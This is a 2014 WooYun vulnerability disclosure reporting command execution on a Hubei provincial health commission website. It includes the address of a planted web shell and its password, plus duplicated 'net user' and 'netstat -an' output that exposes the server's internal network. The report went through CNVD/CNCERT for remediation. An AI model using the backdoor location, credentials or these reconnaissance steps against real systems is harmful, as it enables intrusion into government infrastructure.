当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065821

漏洞标题:湖北省卫生计生委存在命令执行漏洞导致内网渗透

相关厂商:www.hbwsjs.gov.cn

漏洞作者: Mr_Java

提交时间:2014-06-22 14:05

修复时间:2014-08-06 14:06

公开时间:2014-08-06 14:06

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-22: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-06: 细节向公众公开

简要描述:

湖北省卫生计生委存在命令执行漏洞 整站沦陷 导致内网渗透
还有很多这样的政府网站,会逐一提交

详细说明:

后门地址: http://www.hbwsjs.gov.cn/adglif/css.jsp
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>net user
==============================================================================================================================
\\WIN-HSEDS6N9UN6 ûʻ
-------------------------------------------------------------------------------
Administrator Guest
ɹɡ
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>netstat -an
==============================================================================================================================

Э صַ ⲿַ ״̬
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5939 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5939 127.0.0.1:58034 ESTABLISHED
TCP 127.0.0.1:58034 127.0.0.1:5939 ESTABLISHED
TCP 192.168.20.108:80 0.0.0.0:0 LISTENING
TCP 192.168.20.108:80 42.19.253.1:1201 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:1295 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:15501 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:26875 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26876 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26877 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26878 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26879 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26880 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26887 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:36759 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:37682 FIN_WAIT_1
TCP 192.168.20.108:80 42.19.253.1:40896 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:47163 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:51868 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:53097 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:54121 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:56759 TIME_WAIT
TCP 192.168.20.108:139 0.0.0.0:0 LISTENING
TCP 192.168.20.108:49188 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:49329 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:50301 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:50923 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:51470 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51472 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51473 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51475 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51478 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51479 218.30.116.13:80 ESTABLISHED
TCP 192.168.20.108:51791 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:52100 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:62373 95.211.37.211:5938 ESTABLISHED
TCP 192.168.20.108:63835 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:63975 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64006 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64007 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64036 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64081 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64118 60.174.234.107:21 CLOSE_WAIT
TCP 192.168.20.108:64119 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64128 60.174.234.107:21 CLOSE_WAIT
TCP 192.168.20.108:64129 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64168 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64185 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64186 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64246 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:64724 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:65121 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:65527 192.168.20.109:1521 ESTABLISHED
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49156 [::]:0 LISTENING
TCP [::1]:80 [::]:0 LISTENING
TCP [2001:0:9d38:90d7:8a5:3da2:3f57:eb93]:80 [::]:0 LISTENING
TCP [fe80::5efe:192.168.20.108%12]:80 [::]:0 LISTENING
TCP [fe80::8a5:3da2:3f57:eb93%15]:80 [::]:0 LISTENING
TCP [fe80::bdfc:d6c3:6926:8de7%13]:80 [::]:0 LISTENING
TCP [fe80::e92e:254c:46d3:e439%11]:80 [::]:0 LISTENING
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:3600 *:*
UDP 0.0.0.0:4001 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:51467 *:*
UDP 0.0.0.0:56357 *:*
UDP 0.0.0.0:56587 *:*
UDP 0.0.0.0:58392 *:*
UDP 0.0.0.0:58393 *:*
UDP 0.0.0.0:59646 *:*
UDP 0.0.0.0:60181 *:*
UDP 0.0.0.0:60182 *:*
UDP 0.0.0.0:60900 *:*
UDP 0.0.0.0:60956 *:*
UDP 0.0.0.0:61859 *:*
UDP 0.0.0.0:64367 *:*
UDP 0.0.0.0:64897 *:*
UDP 0.0.0.0:65379 *:*
UDP 0.0.0.0:65409 *:*
UDP 127.0.0.1:50469 *:*
UDP 127.0.0.1:51369 *:*
UDP 127.0.0.1:61236 *:*
UDP 127.0.0.1:62947 *:*
UDP 127.0.0.1:63079 *:*
UDP 127.0.0.1:63274 *:*
UDP 192.168.20.108:137 *:*
UDP 192.168.20.108:138 *:*
UDP [::]:500 *:*
UDP [::]:4500 *:*
UDP [::]:5355 *:*
UDP [::1]:50470 *:*
UDP [::1]:51370 *:*
UDP [::1]:61237 *:*
UDP [::1]:63275 *:*
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>


湖北省卫生计生委存在命令执行漏洞 整站沦陷 导致内网渗透

漏洞证明:

后门地址: http://www.hbwsjs.gov.cn/adglif/css.jsp
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>net user
==============================================================================================================================
\\WIN-HSEDS6N9UN6 ûʻ
-------------------------------------------------------------------------------
Administrator Guest
ɹɡ
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>netstat -an
==============================================================================================================================

Э صַ ⲿַ ״̬
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5939 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5939 127.0.0.1:58034 ESTABLISHED
TCP 127.0.0.1:58034 127.0.0.1:5939 ESTABLISHED
TCP 192.168.20.108:80 0.0.0.0:0 LISTENING
TCP 192.168.20.108:80 42.19.253.1:1201 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:1295 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:15501 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:26875 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26876 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26877 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26878 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26879 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26880 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:26887 FIN_WAIT_2
TCP 192.168.20.108:80 42.19.253.1:36759 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:37682 FIN_WAIT_1
TCP 192.168.20.108:80 42.19.253.1:40896 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:47163 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:51868 ESTABLISHED
TCP 192.168.20.108:80 42.19.253.1:53097 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:54121 TIME_WAIT
TCP 192.168.20.108:80 42.19.253.1:56759 TIME_WAIT
TCP 192.168.20.108:139 0.0.0.0:0 LISTENING
TCP 192.168.20.108:49188 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:49329 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:50301 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:50923 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:51470 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51472 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51473 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51475 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51478 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:51479 218.30.116.13:80 ESTABLISHED
TCP 192.168.20.108:51791 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:52100 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:62373 95.211.37.211:5938 ESTABLISHED
TCP 192.168.20.108:63835 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:63975 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64006 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64007 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64036 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64081 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64118 60.174.234.107:21 CLOSE_WAIT
TCP 192.168.20.108:64119 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64128 60.174.234.107:21 CLOSE_WAIT
TCP 192.168.20.108:64129 0.0.0.0:0 LISTENING
TCP 192.168.20.108:64168 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64185 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64186 192.168.20.109:1521 ESTABLISHED
TCP 192.168.20.108:64246 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:64724 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:65121 59.173.11.92:80 CLOSE_WAIT
TCP 192.168.20.108:65527 192.168.20.109:1521 ESTABLISHED
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49156 [::]:0 LISTENING
TCP [::1]:80 [::]:0 LISTENING
TCP [2001:0:9d38:90d7:8a5:3da2:3f57:eb93]:80 [::]:0 LISTENING
TCP [fe80::5efe:192.168.20.108%12]:80 [::]:0 LISTENING
TCP [fe80::8a5:3da2:3f57:eb93%15]:80 [::]:0 LISTENING
TCP [fe80::bdfc:d6c3:6926:8de7%13]:80 [::]:0 LISTENING
TCP [fe80::e92e:254c:46d3:e439%11]:80 [::]:0 LISTENING
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:3600 *:*
UDP 0.0.0.0:4001 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:51467 *:*
UDP 0.0.0.0:56357 *:*
UDP 0.0.0.0:56587 *:*
UDP 0.0.0.0:58392 *:*
UDP 0.0.0.0:58393 *:*
UDP 0.0.0.0:59646 *:*
UDP 0.0.0.0:60181 *:*
UDP 0.0.0.0:60182 *:*
UDP 0.0.0.0:60900 *:*
UDP 0.0.0.0:60956 *:*
UDP 0.0.0.0:61859 *:*
UDP 0.0.0.0:64367 *:*
UDP 0.0.0.0:64897 *:*
UDP 0.0.0.0:65379 *:*
UDP 0.0.0.0:65409 *:*
UDP 127.0.0.1:50469 *:*
UDP 127.0.0.1:51369 *:*
UDP 127.0.0.1:61236 *:*
UDP 127.0.0.1:62947 *:*
UDP 127.0.0.1:63079 *:*
UDP 127.0.0.1:63274 *:*
UDP 192.168.20.108:137 *:*
UDP 192.168.20.108:138 *:*
UDP [::]:500 *:*
UDP [::]:4500 *:*
UDP [::]:5355 *:*
UDP [::1]:50470 *:*
UDP [::1]:51370 *:*
UDP [::1]:61237 *:*
UDP [::1]:63275 *:*
E:\Oracle\Middleware\user_projects\domains\base_domain\autodeploy\adglif\adglif>


湖北省卫生计生委存在命令执行漏洞 整站沦陷 导致内网渗透

QQ截图20140622124730.jpg


<img src="/upload/201406/221251398d3945795d00de20c5940abb4bcf2514.jpg"alt="k8.jpg" />
木马连接地址 --http://www.hbwsjs.gov.cn/adglif/css.jsp 密码 k8
http://www.hbwsjs.gov.cn/adglif/Login!login.action

k8.jpg

修复方案:

你们懂得。

版权声明:转载请注明来源 Mr_Java@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-06-26 22:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理方,除修复漏洞外建议排查和清除网站后门。按通用软件漏洞及后门事件综合评分,rank 11

最新状态:

暂无